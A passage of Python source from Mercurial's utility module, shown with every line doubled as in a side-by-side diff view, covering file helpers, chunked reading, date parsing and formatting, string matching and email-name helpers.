1695 if err.errno == errno.EEXIST:
1695 if err.errno == errno.EEXIST:
1696 return
1696 return
1697 if err.errno != errno.ENOENT or not name:
1697 if err.errno != errno.ENOENT or not name:
1698 raise
1698 raise
1699 parent = os.path.dirname(os.path.abspath(name))
1699 parent = os.path.dirname(os.path.abspath(name))
1700 if parent == name:
1700 if parent == name:
1701 raise
1701 raise
1702 makedirs(parent, mode, notindexed)
1702 makedirs(parent, mode, notindexed)
1703 try:
1703 try:
1704 makedir(name, notindexed)
1704 makedir(name, notindexed)
1705 except OSError as err:
1705 except OSError as err:
1706 # Catch EEXIST to handle races
1706 # Catch EEXIST to handle races
1707 if err.errno == errno.EEXIST:
1707 if err.errno == errno.EEXIST:
1708 return
1708 return
1709 raise
1709 raise
1710 if mode is not None:
1710 if mode is not None:
1711 os.chmod(name, mode)
1711 os.chmod(name, mode)
1712
1712
1713 def readfile(path):
1713 def readfile(path):
1714 with open(path, 'rb') as fp:
1714 with open(path, 'rb') as fp:
1715 return fp.read()
1715 return fp.read()
1716
1716
1717 def writefile(path, text):
1717 def writefile(path, text):
1718 with open(path, 'wb') as fp:
1718 with open(path, 'wb') as fp:
1719 fp.write(text)
1719 fp.write(text)
1720
1720
1721 def appendfile(path, text):
1721 def appendfile(path, text):
1722 with open(path, 'ab') as fp:
1722 with open(path, 'ab') as fp:
1723 fp.write(text)
1723 fp.write(text)
1724
1724
1725 class chunkbuffer(object):
1725 class chunkbuffer(object):
1726 """Allow arbitrary sized chunks of data to be efficiently read from an
1726 """Allow arbitrary sized chunks of data to be efficiently read from an
1727 iterator over chunks of arbitrary size."""
1727 iterator over chunks of arbitrary size."""
1728
1728
1729 def __init__(self, in_iter):
1729 def __init__(self, in_iter):
1730 """in_iter is the iterator that's iterating over the input chunks.
1730 """in_iter is the iterator that's iterating over the input chunks.
1731 targetsize is how big a buffer to try to maintain."""
1731 targetsize is how big a buffer to try to maintain."""
1732 def splitbig(chunks):
1732 def splitbig(chunks):
1733 for chunk in chunks:
1733 for chunk in chunks:
1734 if len(chunk) > 2**20:
1734 if len(chunk) > 2**20:
1735 pos = 0
1735 pos = 0
1736 while pos < len(chunk):
1736 while pos < len(chunk):
1737 end = pos + 2 ** 18
1737 end = pos + 2 ** 18
1738 yield chunk[pos:end]
1738 yield chunk[pos:end]
1739 pos = end
1739 pos = end
1740 else:
1740 else:
1741 yield chunk
1741 yield chunk
1742 self.iter = splitbig(in_iter)
1742 self.iter = splitbig(in_iter)
1743 self._queue = collections.deque()
1743 self._queue = collections.deque()
1744 self._chunkoffset = 0
1744 self._chunkoffset = 0
1745
1745
1746 def read(self, l=None):
1746 def read(self, l=None):
1747 """Read L bytes of data from the iterator of chunks of data.
1747 """Read L bytes of data from the iterator of chunks of data.
1748 Returns less than L bytes if the iterator runs dry.
1748 Returns less than L bytes if the iterator runs dry.
1749
1749
1750 If size parameter is omitted, read everything"""
1750 If size parameter is omitted, read everything"""
1751 if l is None:
1751 if l is None:
1752 return ''.join(self.iter)
1752 return ''.join(self.iter)
1753
1753
1754 left = l
1754 left = l
1755 buf = []
1755 buf = []
1756 queue = self._queue
1756 queue = self._queue
1757 while left > 0:
1757 while left > 0:
1758 # refill the queue
1758 # refill the queue
1759 if not queue:
1759 if not queue:
1760 target = 2**18
1760 target = 2**18
1761 for chunk in self.iter:
1761 for chunk in self.iter:
1762 queue.append(chunk)
1762 queue.append(chunk)
1763 target -= len(chunk)
1763 target -= len(chunk)
1764 if target <= 0:
1764 if target <= 0:
1765 break
1765 break
1766 if not queue:
1766 if not queue:
1767 break
1767 break
1768
1768
1769 # The easy way to do this would be to queue.popleft(), modify the
1769 # The easy way to do this would be to queue.popleft(), modify the
1770 # chunk (if necessary), then queue.appendleft(). However, for cases
1770 # chunk (if necessary), then queue.appendleft(). However, for cases
1771 # where we read partial chunk content, this incurs 2 dequeue
1771 # where we read partial chunk content, this incurs 2 dequeue
1772 # mutations and creates a new str for the remaining chunk in the
1772 # mutations and creates a new str for the remaining chunk in the
1773 # queue. Our code below avoids this overhead.
1773 # queue. Our code below avoids this overhead.
1774
1774
1775 chunk = queue[0]
1775 chunk = queue[0]
1776 chunkl = len(chunk)
1776 chunkl = len(chunk)
1777 offset = self._chunkoffset
1777 offset = self._chunkoffset
1778
1778
1779 # Use full chunk.
1779 # Use full chunk.
1780 if offset == 0 and left >= chunkl:
1780 if offset == 0 and left >= chunkl:
1781 left -= chunkl
1781 left -= chunkl
1782 queue.popleft()
1782 queue.popleft()
1783 buf.append(chunk)
1783 buf.append(chunk)
1784 # self._chunkoffset remains at 0.
1784 # self._chunkoffset remains at 0.
1785 continue
1785 continue
1786
1786
1787 chunkremaining = chunkl - offset
1787 chunkremaining = chunkl - offset
1788
1788
1789 # Use all of unconsumed part of chunk.
1789 # Use all of unconsumed part of chunk.
1790 if left >= chunkremaining:
1790 if left >= chunkremaining:
1791 left -= chunkremaining
1791 left -= chunkremaining
1792 queue.popleft()
1792 queue.popleft()
1793 # offset == 0 is enabled by block above, so this won't merely
1793 # offset == 0 is enabled by block above, so this won't merely
1794 # copy via ``chunk[0:]``.
1794 # copy via ``chunk[0:]``.
1795 buf.append(chunk[offset:])
1795 buf.append(chunk[offset:])
1796 self._chunkoffset = 0
1796 self._chunkoffset = 0
1797
1797
1798 # Partial chunk needed.
1798 # Partial chunk needed.
1799 else:
1799 else:
1800 buf.append(chunk[offset:offset + left])
1800 buf.append(chunk[offset:offset + left])
1801 self._chunkoffset += left
1801 self._chunkoffset += left
1802 left -= chunkremaining
1802 left -= chunkremaining
1803
1803
1804 return ''.join(buf)
1804 return ''.join(buf)
1805
1805
1806 def filechunkiter(f, size=131072, limit=None):
1806 def filechunkiter(f, size=131072, limit=None):
1807 """Create a generator that produces the data in the file size
1807 """Create a generator that produces the data in the file size
1808 (default 131072) bytes at a time, up to optional limit (default is
1808 (default 131072) bytes at a time, up to optional limit (default is
1809 to read all data). Chunks may be less than size bytes if the
1809 to read all data). Chunks may be less than size bytes if the
1810 chunk is the last chunk in the file, or the file is a socket or
1810 chunk is the last chunk in the file, or the file is a socket or
1811 some other type of file that sometimes reads less data than is
1811 some other type of file that sometimes reads less data than is
1812 requested."""
1812 requested."""
1813 assert size >= 0
1813 assert size >= 0
1814 assert limit is None or limit >= 0
1814 assert limit is None or limit >= 0
1815 while True:
1815 while True:
1816 if limit is None:
1816 if limit is None:
1817 nbytes = size
1817 nbytes = size
1818 else:
1818 else:
1819 nbytes = min(limit, size)
1819 nbytes = min(limit, size)
1820 s = nbytes and f.read(nbytes)
1820 s = nbytes and f.read(nbytes)
1821 if not s:
1821 if not s:
1822 break
1822 break
1823 if limit:
1823 if limit:
1824 limit -= len(s)
1824 limit -= len(s)
1825 yield s
1825 yield s
1826
1826
1827 def makedate(timestamp=None):
1827 def makedate(timestamp=None):
1828 '''Return a unix timestamp (or the current time) as a (unixtime,
1828 '''Return a unix timestamp (or the current time) as a (unixtime,
1829 offset) tuple based off the local timezone.'''
1829 offset) tuple based off the local timezone.'''
1830 if timestamp is None:
1830 if timestamp is None:
1831 timestamp = time.time()
1831 timestamp = time.time()
1832 if timestamp < 0:
1832 if timestamp < 0:
1833 hint = _("check your clock")
1833 hint = _("check your clock")
1834 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1834 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1835 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1835 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1836 datetime.datetime.fromtimestamp(timestamp))
1836 datetime.datetime.fromtimestamp(timestamp))
1837 tz = delta.days * 86400 + delta.seconds
1837 tz = delta.days * 86400 + delta.seconds
1838 return timestamp, tz
1838 return timestamp, tz
1839
1839
1840 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1840 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1841 """represent a (unixtime, offset) tuple as a localized time.
1841 """represent a (unixtime, offset) tuple as a localized time.
1842 unixtime is seconds since the epoch, and offset is the time zone's
1842 unixtime is seconds since the epoch, and offset is the time zone's
1843 number of seconds away from UTC.
1843 number of seconds away from UTC.
1844
1844
1845 >>> datestr((0, 0))
1845 >>> datestr((0, 0))
1846 'Thu Jan 01 00:00:00 1970 +0000'
1846 'Thu Jan 01 00:00:00 1970 +0000'
1847 >>> datestr((42, 0))
1847 >>> datestr((42, 0))
1848 'Thu Jan 01 00:00:42 1970 +0000'
1848 'Thu Jan 01 00:00:42 1970 +0000'
1849 >>> datestr((-42, 0))
1849 >>> datestr((-42, 0))
1850 'Wed Dec 31 23:59:18 1969 +0000'
1850 'Wed Dec 31 23:59:18 1969 +0000'
1851 >>> datestr((0x7fffffff, 0))
1851 >>> datestr((0x7fffffff, 0))
1852 'Tue Jan 19 03:14:07 2038 +0000'
1852 'Tue Jan 19 03:14:07 2038 +0000'
1853 >>> datestr((-0x80000000, 0))
1853 >>> datestr((-0x80000000, 0))
1854 'Fri Dec 13 20:45:52 1901 +0000'
1854 'Fri Dec 13 20:45:52 1901 +0000'
1855 """
1855 """
1856 t, tz = date or makedate()
1856 t, tz = date or makedate()
1857 if "%1" in format or "%2" in format or "%z" in format:
1857 if "%1" in format or "%2" in format or "%z" in format:
1858 sign = (tz > 0) and "-" or "+"
1858 sign = (tz > 0) and "-" or "+"
1859 minutes = abs(tz) // 60
1859 minutes = abs(tz) // 60
1860 q, r = divmod(minutes, 60)
1860 q, r = divmod(minutes, 60)
1861 format = format.replace("%z", "%1%2")
1861 format = format.replace("%z", "%1%2")
1862 format = format.replace("%1", "%c%02d" % (sign, q))
1862 format = format.replace("%1", "%c%02d" % (sign, q))
1863 format = format.replace("%2", "%02d" % r)
1863 format = format.replace("%2", "%02d" % r)
1864 d = t - tz
1864 d = t - tz
1865 if d > 0x7fffffff:
1865 if d > 0x7fffffff:
1866 d = 0x7fffffff
1866 d = 0x7fffffff
1867 elif d < -0x80000000:
1867 elif d < -0x80000000:
1868 d = -0x80000000
1868 d = -0x80000000
1869 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1869 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1870 # because they use the gmtime() system call which is buggy on Windows
1870 # because they use the gmtime() system call which is buggy on Windows
1871 # for negative values.
1871 # for negative values.
1872 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1872 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1873 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1873 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1874 return s
1874 return s
1875
1875
1876 def shortdate(date=None):
1876 def shortdate(date=None):
1877 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1877 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1878 return datestr(date, format='%Y-%m-%d')
1878 return datestr(date, format='%Y-%m-%d')
1879
1879
1880 def parsetimezone(s):
1880 def parsetimezone(s):
1881 """find a trailing timezone, if any, in string, and return a
1881 """find a trailing timezone, if any, in string, and return a
1882 (offset, remainder) pair"""
1882 (offset, remainder) pair"""
1883
1883
1884 if s.endswith("GMT") or s.endswith("UTC"):
1884 if s.endswith("GMT") or s.endswith("UTC"):
1885 return 0, s[:-3].rstrip()
1885 return 0, s[:-3].rstrip()
1886
1886
1887 # Unix-style timezones [+-]hhmm
1887 # Unix-style timezones [+-]hhmm
1888 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1888 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1889 sign = (s[-5] == "+") and 1 or -1
1889 sign = (s[-5] == "+") and 1 or -1
1890 hours = int(s[-4:-2])
1890 hours = int(s[-4:-2])
1891 minutes = int(s[-2:])
1891 minutes = int(s[-2:])
1892 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1892 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1893
1893
1894 # ISO8601 trailing Z
1894 # ISO8601 trailing Z
1895 if s.endswith("Z") and s[-2:-1].isdigit():
1895 if s.endswith("Z") and s[-2:-1].isdigit():
1896 return 0, s[:-1]
1896 return 0, s[:-1]
1897
1897
1898 # ISO8601-style [+-]hh:mm
1898 # ISO8601-style [+-]hh:mm
1899 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1899 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1900 s[-5:-3].isdigit() and s[-2:].isdigit()):
1900 s[-5:-3].isdigit() and s[-2:].isdigit()):
1901 sign = (s[-6] == "+") and 1 or -1
1901 sign = (s[-6] == "+") and 1 or -1
1902 hours = int(s[-5:-3])
1902 hours = int(s[-5:-3])
1903 minutes = int(s[-2:])
1903 minutes = int(s[-2:])
1904 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1904 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1905
1905
1906 return None, s
1906 return None, s
1907
1907
1908 def strdate(string, format, defaults=None):
1908 def strdate(string, format, defaults=None):
1909 """parse a localized time string and return a (unixtime, offset) tuple.
1909 """parse a localized time string and return a (unixtime, offset) tuple.
1910 if the string cannot be parsed, ValueError is raised."""
1910 if the string cannot be parsed, ValueError is raised."""
1911 if defaults is None:
1911 if defaults is None:
1912 defaults = {}
1912 defaults = {}
1913
1913
1914 # NOTE: unixtime = localunixtime + offset
1914 # NOTE: unixtime = localunixtime + offset
1915 offset, date = parsetimezone(string)
1915 offset, date = parsetimezone(string)
1916
1916
1917 # add missing elements from defaults
1917 # add missing elements from defaults
1918 usenow = False # default to using biased defaults
1918 usenow = False # default to using biased defaults
1919 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1919 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1920 found = [True for p in part if ("%"+p) in format]
1920 found = [True for p in part if ("%"+p) in format]
1921 if not found:
1921 if not found:
1922 date += "@" + defaults[part][usenow]
1922 date += "@" + defaults[part][usenow]
1923 format += "@%" + part[0]
1923 format += "@%" + part[0]
1924 else:
1924 else:
1925 # We've found a specific time element, less specific time
1925 # We've found a specific time element, less specific time
1926 # elements are relative to today
1926 # elements are relative to today
1927 usenow = True
1927 usenow = True
1928
1928
1929 timetuple = time.strptime(date, format)
1929 timetuple = time.strptime(date, format)
1930 localunixtime = int(calendar.timegm(timetuple))
1930 localunixtime = int(calendar.timegm(timetuple))
1931 if offset is None:
1931 if offset is None:
1932 # local timezone
1932 # local timezone
1933 unixtime = int(time.mktime(timetuple))
1933 unixtime = int(time.mktime(timetuple))
1934 offset = unixtime - localunixtime
1934 offset = unixtime - localunixtime
1935 else:
1935 else:
1936 unixtime = localunixtime + offset
1936 unixtime = localunixtime + offset
1937 return unixtime, offset
1937 return unixtime, offset
1938
1938
1939 def parsedate(date, formats=None, bias=None):
1939 def parsedate(date, formats=None, bias=None):
1940 """parse a localized date/time and return a (unixtime, offset) tuple.
1940 """parse a localized date/time and return a (unixtime, offset) tuple.
1941
1941
1942 The date may be a "unixtime offset" string or in one of the specified
1942 The date may be a "unixtime offset" string or in one of the specified
1943 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1943 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1944
1944
1945 >>> parsedate(' today ') == parsedate(\
1945 >>> parsedate(' today ') == parsedate(\
1946 datetime.date.today().strftime('%b %d'))
1946 datetime.date.today().strftime('%b %d'))
1947 True
1947 True
1948 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1948 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1949 datetime.timedelta(days=1)\
1949 datetime.timedelta(days=1)\
1950 ).strftime('%b %d'))
1950 ).strftime('%b %d'))
1951 True
1951 True
1952 >>> now, tz = makedate()
1952 >>> now, tz = makedate()
1953 >>> strnow, strtz = parsedate('now')
1953 >>> strnow, strtz = parsedate('now')
1954 >>> (strnow - now) < 1
1954 >>> (strnow - now) < 1
1955 True
1955 True
1956 >>> tz == strtz
1956 >>> tz == strtz
1957 True
1957 True
1958 """
1958 """
1959 if bias is None:
1959 if bias is None:
1960 bias = {}
1960 bias = {}
1961 if not date:
1961 if not date:
1962 return 0, 0
1962 return 0, 0
1963 if isinstance(date, tuple) and len(date) == 2:
1963 if isinstance(date, tuple) and len(date) == 2:
1964 return date
1964 return date
1965 if not formats:
1965 if not formats:
1966 formats = defaultdateformats
1966 formats = defaultdateformats
1967 date = date.strip()
1967 date = date.strip()
1968
1968
1969 if date == 'now' or date == _('now'):
1969 if date == 'now' or date == _('now'):
1970 return makedate()
1970 return makedate()
1971 if date == 'today' or date == _('today'):
1971 if date == 'today' or date == _('today'):
1972 date = datetime.date.today().strftime('%b %d')
1972 date = datetime.date.today().strftime('%b %d')
1973 elif date == 'yesterday' or date == _('yesterday'):
1973 elif date == 'yesterday' or date == _('yesterday'):
1974 date = (datetime.date.today() -
1974 date = (datetime.date.today() -
1975 datetime.timedelta(days=1)).strftime('%b %d')
1975 datetime.timedelta(days=1)).strftime('%b %d')
1976
1976
1977 try:
1977 try:
1978 when, offset = map(int, date.split(' '))
1978 when, offset = map(int, date.split(' '))
1979 except ValueError:
1979 except ValueError:
1980 # fill out defaults
1980 # fill out defaults
1981 now = makedate()
1981 now = makedate()
1982 defaults = {}
1982 defaults = {}
1983 for part in ("d", "mb", "yY", "HI", "M", "S"):
1983 for part in ("d", "mb", "yY", "HI", "M", "S"):
1984 # this piece is for rounding the specific end of unknowns
1984 # this piece is for rounding the specific end of unknowns
1985 b = bias.get(part)
1985 b = bias.get(part)
1986 if b is None:
1986 if b is None:
1987 if part[0] in "HMS":
1987 if part[0] in "HMS":
1988 b = "00"
1988 b = "00"
1989 else:
1989 else:
1990 b = "0"
1990 b = "0"
1991
1991
1992 # this piece is for matching the generic end to today's date
1992 # this piece is for matching the generic end to today's date
1993 n = datestr(now, "%" + part[0])
1993 n = datestr(now, "%" + part[0])
1994
1994
1995 defaults[part] = (b, n)
1995 defaults[part] = (b, n)
1996
1996
1997 for format in formats:
1997 for format in formats:
1998 try:
1998 try:
1999 when, offset = strdate(date, format, defaults)
1999 when, offset = strdate(date, format, defaults)
2000 except (ValueError, OverflowError):
2000 except (ValueError, OverflowError):
2001 pass
2001 pass
2002 else:
2002 else:
2003 break
2003 break
2004 else:
2004 else:
2005 raise Abort(_('invalid date: %r') % date)
2005 raise Abort(_('invalid date: %r') % date)
2006 # validate explicit (probably user-specified) date and
2006 # validate explicit (probably user-specified) date and
2007 # time zone offset. values must fit in signed 32 bits for
2007 # time zone offset. values must fit in signed 32 bits for
2008 # current 32-bit linux runtimes. timezones go from UTC-12
2008 # current 32-bit linux runtimes. timezones go from UTC-12
2009 # to UTC+14
2009 # to UTC+14
2010 if when < -0x80000000 or when > 0x7fffffff:
2010 if when < -0x80000000 or when > 0x7fffffff:
2011 raise Abort(_('date exceeds 32 bits: %d') % when)
2011 raise Abort(_('date exceeds 32 bits: %d') % when)
2012 if offset < -50400 or offset > 43200:
2012 if offset < -50400 or offset > 43200:
2013 raise Abort(_('impossible time zone offset: %d') % offset)
2013 raise Abort(_('impossible time zone offset: %d') % offset)
2014 return when, offset
2014 return when, offset
2015
2015
2016 def matchdate(date):
2016 def matchdate(date):
2017 """Return a function that matches a given date match specifier
2017 """Return a function that matches a given date match specifier
2018
2018
2019 Formats include:
2019 Formats include:
2020
2020
2021 '{date}' match a given date to the accuracy provided
2021 '{date}' match a given date to the accuracy provided
2022
2022
2023 '<{date}' on or before a given date
2023 '<{date}' on or before a given date
2024
2024
2025 '>{date}' on or after a given date
2025 '>{date}' on or after a given date
2026
2026
2027 >>> p1 = parsedate("10:29:59")
2027 >>> p1 = parsedate("10:29:59")
2028 >>> p2 = parsedate("10:30:00")
2028 >>> p2 = parsedate("10:30:00")
2029 >>> p3 = parsedate("10:30:59")
2029 >>> p3 = parsedate("10:30:59")
2030 >>> p4 = parsedate("10:31:00")
2030 >>> p4 = parsedate("10:31:00")
2031 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2031 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2032 >>> f = matchdate("10:30")
2032 >>> f = matchdate("10:30")
2033 >>> f(p1[0])
2033 >>> f(p1[0])
2034 False
2034 False
2035 >>> f(p2[0])
2035 >>> f(p2[0])
2036 True
2036 True
2037 >>> f(p3[0])
2037 >>> f(p3[0])
2038 True
2038 True
2039 >>> f(p4[0])
2039 >>> f(p4[0])
2040 False
2040 False
2041 >>> f(p5[0])
2041 >>> f(p5[0])
2042 False
2042 False
2043 """
2043 """
2044
2044
2045 def lower(date):
2045 def lower(date):
2046 d = {'mb': "1", 'd': "1"}
2046 d = {'mb': "1", 'd': "1"}
2047 return parsedate(date, extendeddateformats, d)[0]
2047 return parsedate(date, extendeddateformats, d)[0]
2048
2048
2049 def upper(date):
2049 def upper(date):
2050 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2050 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2051 for days in ("31", "30", "29"):
2051 for days in ("31", "30", "29"):
2052 try:
2052 try:
2053 d["d"] = days
2053 d["d"] = days
2054 return parsedate(date, extendeddateformats, d)[0]
2054 return parsedate(date, extendeddateformats, d)[0]
2055 except Abort:
2055 except Abort:
2056 pass
2056 pass
2057 d["d"] = "28"
2057 d["d"] = "28"
2058 return parsedate(date, extendeddateformats, d)[0]
2058 return parsedate(date, extendeddateformats, d)[0]
2059
2059
2060 date = date.strip()
2060 date = date.strip()
2061
2061
2062 if not date:
2062 if not date:
2063 raise Abort(_("dates cannot consist entirely of whitespace"))
2063 raise Abort(_("dates cannot consist entirely of whitespace"))
2064 elif date[0] == "<":
2064 elif date[0] == "<":
2065 if not date[1:]:
2065 if not date[1:]:
2066 raise Abort(_("invalid day spec, use '<DATE'"))
2066 raise Abort(_("invalid day spec, use '<DATE'"))
2067 when = upper(date[1:])
2067 when = upper(date[1:])
2068 return lambda x: x <= when
2068 return lambda x: x <= when
2069 elif date[0] == ">":
2069 elif date[0] == ">":
2070 if not date[1:]:
2070 if not date[1:]:
2071 raise Abort(_("invalid day spec, use '>DATE'"))
2071 raise Abort(_("invalid day spec, use '>DATE'"))
2072 when = lower(date[1:])
2072 when = lower(date[1:])
2073 return lambda x: x >= when
2073 return lambda x: x >= when
2074 elif date[0] == "-":
2074 elif date[0] == "-":
2075 try:
2075 try:
2076 days = int(date[1:])
2076 days = int(date[1:])
2077 except ValueError:
2077 except ValueError:
2078 raise Abort(_("invalid day spec: %s") % date[1:])
2078 raise Abort(_("invalid day spec: %s") % date[1:])
2079 if days < 0:
2079 if days < 0:
2080 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2080 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2081 % date[1:])
2081 % date[1:])
2082 when = makedate()[0] - days * 3600 * 24
2082 when = makedate()[0] - days * 3600 * 24
2083 return lambda x: x >= when
2083 return lambda x: x >= when
2084 elif " to " in date:
2084 elif " to " in date:
2085 a, b = date.split(" to ")
2085 a, b = date.split(" to ")
2086 start, stop = lower(a), upper(b)
2086 start, stop = lower(a), upper(b)
2087 return lambda x: x >= start and x <= stop
2087 return lambda x: x >= start and x <= stop
2088 else:
2088 else:
2089 start, stop = lower(date), upper(date)
2089 start, stop = lower(date), upper(date)
2090 return lambda x: x >= start and x <= stop
2090 return lambda x: x >= start and x <= stop
2091
2091
2092 def stringmatcher(pattern, casesensitive=True):
2092 def stringmatcher(pattern, casesensitive=True):
2093 """
2093 """
2094 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2094 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2095 returns the matcher name, pattern, and matcher function.
2095 returns the matcher name, pattern, and matcher function.
2096 missing or unknown prefixes are treated as literal matches.
2096 missing or unknown prefixes are treated as literal matches.
2097
2097
2098 helper for tests:
2098 helper for tests:
2099 >>> def test(pattern, *tests):
2099 >>> def test(pattern, *tests):
2100 ... kind, pattern, matcher = stringmatcher(pattern)
2100 ... kind, pattern, matcher = stringmatcher(pattern)
2101 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2101 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2102 >>> def itest(pattern, *tests):
2102 >>> def itest(pattern, *tests):
2103 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2103 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2104 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2104 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2105
2105
2106 exact matching (no prefix):
2106 exact matching (no prefix):
2107 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2107 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2108 ('literal', 'abcdefg', [False, False, True])
2108 ('literal', 'abcdefg', [False, False, True])
2109
2109
2110 regex matching ('re:' prefix)
2110 regex matching ('re:' prefix)
2111 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2111 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2112 ('re', 'a.+b', [False, False, True])
2112 ('re', 'a.+b', [False, False, True])
2113
2113
2114 force exact matches ('literal:' prefix)
2114 force exact matches ('literal:' prefix)
2115 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2115 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2116 ('literal', 're:foobar', [False, True])
2116 ('literal', 're:foobar', [False, True])
2117
2117
2118 unknown prefixes are ignored and treated as literals
2118 unknown prefixes are ignored and treated as literals
2119 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2119 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2120 ('literal', 'foo:bar', [False, False, True])
2120 ('literal', 'foo:bar', [False, False, True])
2121
2121
2122 case insensitive regex matches
2122 case insensitive regex matches
2123 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2123 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2124 ('re', 'A.+b', [False, False, True])
2124 ('re', 'A.+b', [False, False, True])
2125
2125
2126 case insensitive literal matches
2126 case insensitive literal matches
2127 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2127 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2128 ('literal', 'ABCDEFG', [False, False, True])
2128 ('literal', 'ABCDEFG', [False, False, True])
2129 """
2129 """
2130 if pattern.startswith('re:'):
2130 if pattern.startswith('re:'):
2131 pattern = pattern[3:]
2131 pattern = pattern[3:]
2132 try:
2132 try:
2133 flags = 0
2133 flags = 0
2134 if not casesensitive:
2134 if not casesensitive:
2135 flags = remod.I
2135 flags = remod.I
2136 regex = remod.compile(pattern, flags)
2136 regex = remod.compile(pattern, flags)
2137 except remod.error as e:
2137 except remod.error as e:
2138 raise error.ParseError(_('invalid regular expression: %s')
2138 raise error.ParseError(_('invalid regular expression: %s')
2139 % e)
2139 % e)
2140 return 're', pattern, regex.search
2140 return 're', pattern, regex.search
2141 elif pattern.startswith('literal:'):
2141 elif pattern.startswith('literal:'):
2142 pattern = pattern[8:]
2142 pattern = pattern[8:]
2143
2143
2144 match = pattern.__eq__
2144 match = pattern.__eq__
2145
2145
2146 if not casesensitive:
2146 if not casesensitive:
2147 ipat = encoding.lower(pattern)
2147 ipat = encoding.lower(pattern)
2148 match = lambda s: ipat == encoding.lower(s)
2148 match = lambda s: ipat == encoding.lower(s)
2149 return 'literal', pattern, match
2149 return 'literal', pattern, match
2150
2150
2151 def shortuser(user):
2151 def shortuser(user):
2152 """Return a short representation of a user name or email address."""
2152 """Return a short representation of a user name or email address."""
2153 f = user.find('@')
2153 f = user.find('@')
2154 if f >= 0:
2154 if f >= 0:
2155 user = user[:f]
2155 user = user[:f]
2156 f = user.find('<')
2156 f = user.find('<')
2157 if f >= 0:
2157 if f >= 0:
2158 user = user[f + 1:]
2158 user = user[f + 1:]
2159 f = user.find(' ')
2159 f = user.find(' ')
2160 if f >= 0:
2160 if f >= 0:
2161 user = user[:f]
2161 user = user[:f]
2162 f = user.find('.')
2162 f = user.find('.')
2163 if f >= 0:
2163 if f >= 0:
2164 user = user[:f]
2164 user = user[:f]
2165 return user
2165 return user
2166
2166
2167 def emailuser(user):
2167 def emailuser(user):
2168 """Return the user portion of an email address."""
2168 """Return the user portion of an email address."""
2169 f = user.find('@')
2169 f = user.find('@')
2170 if f >= 0:
2170 if f >= 0:
2171 user = user[:f]
2171 user = user[:f]
2172 f = user.find('<')
2172 f = user.find('<')
2173 if f >= 0:
2173 if f >= 0:
2174 user = user[f + 1:]
2174 user = user[f + 1:]
2175 return user
2175 return user
2176
2176
2177 def email(author):
2177 def email(author):
2178 '''get email of author.'''
2178 '''get email of author.'''
2179 r = author.find('>')
2179 r = author.find('>')
2180 if r == -1:
2180 if r == -1:
2181 r = None
2181 r = None
2182 return author[author.find('<') + 1:r]
2182 return author[author.find('<') + 1:r]
2183
2183
2184 def ellipsis(text, maxlength=400):
2184 def ellipsis(text, maxlength=400):
2185 """Trim string to at most maxlength (default: 400) columns in display."""
2185 """Trim string to at most maxlength (default: 400) columns in display."""
2186 return encoding.trim(text, maxlength, ellipsis='...')
2186 return encoding.trim(text, maxlength, ellipsis='...')
2187
2187
2188 def unitcountfn(*unittable):
2188 def unitcountfn(*unittable):
2189 '''return a function that renders a readable count of some quantity'''
2189 '''return a function that renders a readable count of some quantity'''
2190
2190
2191 def go(count):
2191 def go(count):
2192 for multiplier, divisor, format in unittable:
2192 for multiplier, divisor, format in unittable:
2193 if abs(count) >= divisor * multiplier:
2193 if abs(count) >= divisor * multiplier:
2194 return format % (count / float(divisor))
2194 return format % (count / float(divisor))
2195 return unittable[-1][2] % count
2195 return unittable[-1][2] % count
2196
2196
2197 return go
